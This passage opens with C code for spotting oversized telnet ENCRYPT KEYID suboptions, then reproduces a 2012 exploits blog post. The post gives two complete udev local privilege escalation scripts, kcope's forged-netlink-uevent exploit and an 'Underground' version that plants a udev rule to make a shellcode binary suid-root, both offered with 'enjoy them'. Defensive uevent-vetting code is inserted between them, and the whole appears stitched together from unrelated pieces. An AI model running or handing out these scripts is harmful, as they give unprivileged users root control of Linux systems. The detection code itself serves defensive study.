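        i = (j + 1 < len) ? j + 2 : len;    /* step past IAC SE */
    }
    return longest;
}
/* 1 if any ENCRYPT KEYID in the stream is longer than the server's buffer. */
int keyid_overflows(const unsigned char *buf, size_t len)
{
    return longest_encrypt_keyid(buf, len) > KEYID_LIMIT;
}
/* Constructed test input: IAC SB ENCRYPT KEYID, keylen bytes of fill, IAC SE (the shape of
 * tnet_option_enc_keyid + key_info + tnet_end_suboption in the exploit). Returns bytes
 * written, or 0 if out is too small or fill would itself need IAC escaping. */
size_t build_keyid_suboption(unsigned char *out, size_t cap, size_t keylen, unsigned char fill)
{
    if (cap < keylen + 6 || fill == IAC) return 0;
    size_t n = 0;
    out[n++] = IAC; out[n++] = SB; out[n++] = TELOPT_ENCRYPT; out[n++] = ENCRYPT_KEYID;
    memset(out + n, fill, keylen); n += keylen;
    out[n++] = IAC; out[n++] = SE;
    return n;
}
```

A key id of 79 bytes (sizeof(struct key_info)) is what the exploit sends; anything above 63 should be dropped or alerted on at the network edge or in the daemon's option parser.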

UDEV KERNEL EVENT Local priv escalations By Kcope and By UNKNOWN

Posted on 8th January 2012 in Exploits

UDEV Kcope version and the Underground bash version, have phun
XD / #HAXNET

#!/bin/sh
# Linux 2.6 Udev expl
# bug found by Sebastian Krahmer
# coded by kcope in 2009
# tested on debian-etch,ubuntu,gentoo
# do a 'cat /proc/net/netlink'
# and set the first arg to this
# script to the pid of the netlink socket
# (the pid is udevd_pid - 1 most of the time)
# + sploit has to be UNIX formatted text :)
# + if it doesn't work the 1st time try more often
cat > ud.c << _EOF
#include <fcntl.h>
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>
#include <dirent.h>
#include <sys/stat.h>
#include <sysexits.h>
#include <wait.h>
#include <signal.h>
#include <sys/socket.h>
#include <linux/types.h>
#include <linux/netlink.h>

#ifndef NETLINK_KOBJECT_UEVENT
#define NETLINK_KOBJECT_UEVENT 15
#endif
#define SHORT_STRING 64
#define MEDIUM_STRING 128
#define BIG_STRING 256
#define LONG_STRING 1024
#define EXTRALONG_STRING 4096
#define TRUE 1
#define FALSE 0

int socket_fd;
struct sockaddr_nl address;
struct msghdr msg;
struct iovec iovector;
int sz = 64*1024;

int main(int argc, char **argv) {
char sysfspath[SHORT_STRING];
char subsystem[SHORT_STRING];
char event[SHORT_STRING];
char major[SHORT_STRING];
char minor[SHORT_STRING];
sprintf(event, "add");
sprintf(subsystem, "block");
sprintf(sysfspath, "/dev/foo");
sprintf(major, "8");
sprintf(minor, "1");
memset(&address, 0, sizeof(address));
address.nl_family = AF_NETLINK;
address.nl_pid = atoi(argv[1]);
address.nl_groups = 0;
msg.msg_name = (void*)&address;
msg.msg_namelen = sizeof(address);
msg.msg_iov = &iovector;
msg.msg_iovlen = 1;
socket_fd = socket(AF_NETLINK, SOCK_DGRAM, NETLINK_KOBJECT_UEVENT);
bind(socket_fd, (struct sockaddr *) &address, sizeof(address));
char message[LONG_STRING];
char *mp;
mp = message;
mp += sprintf(mp, "%s@%s", event, sysfspath) +1;
mp += sprintf(mp, "ACTION=%s", event) +1;
mp += sprintf(mp, "DEVPATH=%s", sysfspath) +1;
mp += sprintf(mp, "MAJOR=%s", major) +1;
mp += sprintf(mp, "MINOR=%s", minor) +1;
mp += sprintf(mp, "SUBSYSTEM=%s", subsystem) +1;
mp += sprintf(mp, "REMOVE_CMD=/bin/bash -i") +1;
iovector.iov_base = (void*)message;
iovector.iov_len = (int)(mp-message);
char *buf;
int buflen;
buf = (char *) &msg;
buflen = (int)(mp-message);
sendmsg(socket_fd, &msg, 0);
close(socket_fd);
sleep(10);
execl("/tmp/acc", "acc", (void*)0);
}
_EOF
gcc ud.c -o /tmp/ud
cat > prog.c << _EOF
#include <unistd.h>
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>

void _init() {
setgid(0);
setuid(0);
unsetenv("LD_PRELOAD");
execl("/bin/sh","sh","-c","/tmp/acc",NULL);
}
_EOF
gcc -o prog.o -c prog.c -fPIC
gcc -shared -Wl,-soname,slib_ex.so.1 -o slib_ex.so.1.0 prog.o -nostartfiles
cat > acc.c << _EOF
int main(void) {
setgid(0);
setuid(0);
execl("/bin/sh","/bin/sh",(char *)NULL);
}
_EOF
gcc -o /tmp/acc acc.c
cp slib_ex.so.1.0 /tmp/slib_ex.so.1.0
/tmp/ud $1
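
Added here as an example, not part of kcope's script: a receiver-side check for the trick the script uses, a uevent datagram sent from userspace instead of the kernel. It parses the NUL-separated "action@devpath", "KEY=VAL" layout the script builds and rejects the event on the sender's nl_pid (assumed to be taken from the sockaddr_nl that recvmsg fills in; only the kernel sends from pid 0) and on the REMOVE_CMD key the script plants. Both sample datagrams are constructed.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>
/* What a receiver learns about one netlink uevent datagram. */
struct uevent_verdict {
    int  from_kernel;    /* sender nl_pid was 0; only the kernel sends from pid 0 */
    int  has_cmd_key;    /* carries REMOVE_CMD=, the key the exploit above plants */
    char action[32];
    char devpath[128];
};
/* strnlen without relying on POSIX feature macros. */
static size_t nul_len(const char *s, size_t max)
{
    size_t n = 0;
    while (n < max && s[n] != '\0') n++;
    return n;
}
/* Parse "action@devpath\0KEY=VAL\0..." (the layout the exploit builds) and vet it.
 * sender_pid is nl_pid from the datagram's sockaddr_nl. Returns 1 if the event may
 * be acted on, 0 if it must be dropped: non-kernel origin, command key, or malformed. */
int vet_uevent(uint32_t sender_pid, const char *msg, size_t len, struct uevent_verdict *v)
{
    memset(v, 0, sizeof *v);
    v->from_kernel = (sender_pid == 0);
    size_t hlen = nul_len(msg, len);
    if (hlen == len) return 0;                         /* header not NUL-terminated */
    const char *at = memchr(msg, '@', hlen);
    if (at == NULL) return 0;                          /* no action@devpath */
    snprintf(v->action, sizeof v->action, "%.*s", (int)(at - msg), msg);
    snprintf(v->devpath, sizeof v->devpath, "%s", at + 1);
    for (size_t off = hlen + 1; off < len; ) {
        const char *kv = msg + off;
        size_t kvlen = nul_len(kv, len - off);
        if (kvlen == len - off) return 0;              /* unterminated KEY=VAL */
        if (strncmp(kv, "REMOVE_CMD=", 11) == 0) v->has_cmd_key = 1;
        off += kvlen + 1;
    }
    return v->from_kernel && !v->has_cmd_key;
}
/* Constructed sample: the environment block the exploit above sends. */
static const char forged_uevent[] =
    "add@/dev/foo\0ACTION=add\0DEVPATH=/dev/foo\0MAJOR=8\0MINOR=1\0"
    "SUBSYSTEM=block\0REMOVE_CMD=/bin/bash -i\0";
#define FORGED_UEVENT_LEN (sizeof forged_uevent - 1)
/* Constructed sample of a benign, kernel-originated add event. */
static const char kernel_uevent[] =
    "add@/devices/virtual/block/loop0\0ACTION=add\0SUBSYSTEM=block\0";
#define KERNEL_UEVENT_LEN (sizeof kernel_uevent - 1)
```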

And for the best version of all…

#!/bin/sh
# ubuntu 10.04 , 10.10 udev local root
if [ -z "$1" ]
then
echo "Usage: $0 <UDEV KERNEL EVENT>"
echo "See http://www.reactivated.net/writing_udev_rules.html"
exit
fi
cat > usn.sh << EOF
#!/bin/sh
chown root:root $PWD/usn
chmod +s $PWD/usn
EOF
cat > usn.c << EOF
char *s="\x31\xc0\x31\xdb\x31\xc9\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\xb0\x0b\xcd\x80";
int main(){
int *r;
*((int *)&r+2)=(int)s;
}
EOF
gcc usn.c -o usn
echo "KERNEL==\"$1\", RUN+=\"$PWD/usn.sh\"" >> /dev/.udev/rules.d/root.rules
chmod +x usn.sh
echo "All set, now wait for udev to restart (reinstall, udev upgrade, SE, raep, threat)"
echo "Once the conf is reloaded, just make the udev event happen : usn file will get suid-root"

That's the Underground one, which is nice and neat, fast and furious :>
Enjoy them all, old now anyhow..
XD